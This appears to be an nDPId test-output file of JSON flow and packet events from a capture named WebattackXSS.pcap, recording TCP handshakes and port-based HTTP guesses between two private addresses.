+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1499347257224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MIRAAD4GlUysEAABwKgKMtfiAFCgDzIpAAAAAKACchCwsQAAAgQFtAQCCAoBOgKtAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":2,"flow_last_seen":1499347257224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1+LmPUR7oA8yKqAScSCu0AAAAgQFtAQCCAoD49QjAToCrQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":3,"flow_last_seen":1499347257225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347257225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MIVAAD4GlVOsEAABwKgKMtfiAFCgDzIq5j1EfIAQAOVN2AAAAQEICgE6Aq0D49Qj"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347258474,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347258474,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87xpAAD4G1rWsEAABwKgKMtfwAFBQ0ez\/AAAAAKACchBD0wAAAgQFtAQCCAoBOgPlAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/Cr4O+wUNHtAKAScSDP4AAAAgQFtAQCCAoD49VcAToD5QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1499347258474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07xtAAD4G1rysEAABwKgKMtfwAFBQ0e0Aq+DvsYAQAOVu5wAAAQEICgE6A+YD49Vc"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347259759,"flow_last_seen":1499347259759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347259759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1499347259759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xl9AAD4GZ3GsEAABwKgKMtf+AFDARlt4AAAAAKACchBklQAAAgQFtAQCCAoBOgUnAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":2,"flow_last_seen":1499347259759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/6Hgb3OwEZbeaAScSBFowAAAgQFtAQCCAoD49adAToFJwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":3,"flow_last_seen":1499347259760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347259760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XmBAAD4GZ3isEAABwKgKMtf+AFDARlt5h4G9z4AQAOXkqgAAAQEICgE6BScD49ad"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347262289,"flow_last_seen":1499347262289,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1499347262289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ic9AAD4GPAGsEAABwKgKMtgYAFBS2I5QAAAAAKACchCcmQAAAgQFtAQCCAoBOgefAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":1499347262289,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2BhB\/tqnUtiOUaAScSCj2QAAAgQFtAQCCAoD49kVAToHnwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":3,"flow_last_seen":1499347262290,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347262290,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0idBAAD4GPAisEAABwKgKMtgYAFBS2I5RQf7aqIAQAOVC4QAAAQEICgE6B58D49kV"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347263542,"flow_last_seen":1499347263542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347263542,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1499347263542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDNAAD4GcZ2sEAABwKgKMtgmAFA8SlzqAAAAAKACchDjRQAAAgQFtAQCCAoBOgjZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":1499347263542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2CaW4NetPEpc66AScSCXYwAAAgQFtAQCCAoD49pPAToI2QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":3,"flow_last_seen":1499347263543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347263543,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDRAAD4GcaSsEAABwKgKMtgmAFA8SlzrluDXroAQAOU2awAAAQEICgE6CNkD49pP"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347264804,"flow_last_seen":1499347264804,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347264804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1499347264804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264804,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NPtAAD4GkNWsEAABwKgKMtg0AFDy7j7vAAAAAKACchBJUwAAAgQFtAQCCAoBOgoUAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1499347264805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264805,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2DSLlcK98u4+8KAScSAccQAAAgQFtAQCCAoD49uKAToKFAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1499347264805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347264805,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NPxAAD4GkNysEAABwKgKMtg0AFDy7j7wi5XCvoAQAOW7eAAAAQEICgE6ChQD49uK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347266097,"flow_last_seen":1499347266097,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347266097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1499347266097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FmFAAD4Gr2+sEAABwKgKMthCAFDvjR02AAAAAKACchBtHAAAAgQFtAQCCAoBOgtXAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2488,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1499347266098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ELPgbsz740dN6AScSAClAAAAgQFtAQCCAoD49zOAToLVwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1499347266098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347266098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FmJAAD4Gr3asEAABwKgKMthCAFDvjR03z4G7NIAQAOWhmgAAAQEICgE6C1gD49zO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347267376,"flow_last_seen":1499347267376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347267376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1499347267376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/BAAD4GSeCsEAABwKgKMthQAFA8R3dnAAAAAKACchDE4wAAAgQFtAQCCAoBOgyXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1499347267376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2FDz+hz2PEd3aKAScSDS4AAAAgQFtAQCCAoD494NAToMlwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":3,"flow_last_seen":1499347267377,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347267377,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/FAAD4GSeesEAABwKgKMthQAFA8R3do8\/oc94AQAOVx6AAAAQEICgE6DJcD494N"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347268659,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347268659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83S9AAD4G6KCsEAABwKgKMtheAFDSkdD3AAAAAKACchDTuQAAAgQFtAQCCAoBOg3YAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1499347268659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2F43lkso0pHQ+KAScSBuqAAAAgQFtAQCCAoD499OAToN2AEDAwc="} 
